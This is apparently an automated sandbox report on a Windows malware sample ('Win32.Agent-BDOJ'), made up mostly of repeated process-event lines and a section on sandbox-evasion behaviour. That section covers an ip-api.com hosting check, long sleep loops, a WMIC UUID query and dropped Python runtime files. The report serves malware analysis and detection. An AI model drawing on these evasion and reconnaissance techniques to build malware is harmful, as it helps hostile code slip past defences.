                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX (49 identical events)
                Source: C:\Users\user\AppData\Local\Temp\bound.exe; Process information set: NOOPENFILEERRORBOX (57 identical events)
                Source: C:\Windows\System32\tasklist.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical events)
                Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX (51 identical events)

                Malware Analysis System Evasion

                Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Accept-Encoding: identity, User-Agent: python-urllib3/2.2.3
                Source: C:\Users\user\AppData\Local\Temp\bound.exe; Memory allocated: 254B4F50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\bound.exe; Memory allocated: 254CEAA0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; Code function: 2_2_00007FF8E7A68816 sgdt fword ptr [rax]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (6 identical events)
                Source: C:\Users\user\AppData\Local\Temp\bound.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\bound.exe; Thread delayed: 46 successive delays, delay time: 600000, 599828, 599657, 599508, 599357, 599225, 599108, 598969, 598843, 598710, 598591, 598483, 598374, 598266, 598141, 598016, 597904, 597768, 597656, 597437, 597296, 597188, 597078, 596969, 596844, 596735, 596610, 596485, 596360, 596235, 596110, 595985, 595860, 595735, 595610, 595485, 595360, 595235, 595106, 594981, 594766, 594638, 594532, 594407, 594297, 588059
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6071
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5799
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5814
                Source: C:\Users\user\AppData\Local\Temp\bound.exe; Window / User API: threadDelayed 3720
                Source: C:\Users\user\AppData\Local\Temp\bound.exe; Window / User API: threadDelayed 4152
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; Dropped PE files which have not been started, all under C:\Users\user\AppData\Local\Temp\_MEI76122\: _ctypes.pyd, python313.dll, _queue.pyd, _socket.pyd, unicodedata.pyd, _lzma.pyd, _sqlite3.pyd, select.pyd, _decimal.pyd, _hashlib.pyd, rar.exe, _bz2.pyd, _ssl.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; Check user administrative privileges: GetTokenInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe; API coverage: 5.5 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6732; Thread sleep count: 6071 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156; Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5724; Thread sleep count: 81 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5476; Thread sleep count: 5799 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372; Thread sleep count: 108 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592; Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6300; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764; Thread sleep count: 5814 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852; Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6272; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276; Thread sleep time: -22136092888451448s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\bound.exe TID: 6276; Thread sleep time: 46 successive calls, each >= -30000s: -600000s, -599828s, -599657s, -599508s, -599357s, -599225s, -599108s, -598969s, -598843s, -598710s, -598591s, -598483s, -598374s, -598266s, -598141s, -598016s, -597904s, -597768s, -597656s, -597437s, -597296s, -597188s, -597078s, -596969s, -596844s, -596735s, -596610s, -596485s, -596360s, -596235s, -596110s, -595985s, -595860s, -595735s, -595610s, -595485s, -595360s, -595235s, -595106s, -594981s, -594766s, -594638s, -594532s, -594407s, -594297s, -588059s
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7EAD083C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD09280 FindFirstFileExW,FindClose,0_2_00007FF7EAD09280
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD21874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EAD21874
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD09280 FindFirstFileExW,FindClose,2_2_00007FF7EAD09280
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7EAD083C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF7EAD21874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7EAD21874
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599828
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599657
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599508
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599357
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599225
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 599108
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598969
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598843
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598710
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598591
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598483
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598374
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598266
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598141
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 598016
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597904
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597768
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597656
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597437
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597296
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597188
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 597078
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596969
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596844
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Local\Temp\bound.exeThread delayed: delay time: 595360
